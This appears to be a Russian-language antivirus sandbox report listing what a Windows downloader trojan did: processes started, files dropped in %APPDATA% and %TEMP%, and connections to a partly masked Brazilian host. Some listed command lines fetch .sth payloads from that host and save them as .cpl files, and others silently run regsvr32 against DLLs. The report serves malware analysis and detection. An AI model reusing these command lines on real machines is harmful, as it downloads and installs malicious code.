Техническая информация
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/03.sth "%APPDATA%\PrgFile.cpl"
- '%APPDATA%\start.cpl'
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/02.sth "%APPDATA%\cont.cpl"
- '%APPDATA%\begin.exe'
- '%APPDATA%\show.exe' http://www.sa###.com.br/arquivos/.config/01.sth "%APPDATA%\start.cpl"
- '%APPDATA%\start.cpl' (загружен из сети Интернет)
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\windows\NtSysDef.dll"
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\*.dll"
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10 -w 10000
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\windows\*.dll"
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 3 -w 10000
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\begin.bat" "
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\SysPluginv9b.0.2012.0.dll"
- '<SYSTEM32>\regsvr32.exe' /s /u "%APPDATA%\CRNJEUFU\CRNJEUFUSysPluginv9b.0.2012.0.dll"
- %APPDATA%\start.cpl
- %APPDATA%\cont.cpl
- %APPDATA%\PrgFile.cpl
- %APPDATA%\show.exe
- %APPDATA%\begin.exe
- %TEMP%\1.tmp\begin.bat
- %TEMP%\1.tmp\begin.bat
- %APPDATA%\show.exe
- 'www.sa###.com.br':80
- www.sa###.com.br/arquivos/.config/03.sth
- www.sa###.com.br/arquivos/.config/02.sth
- www.sa###.com.br/arquivos/.config/01.sth
- DNS ASK www.sa###.com.br
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'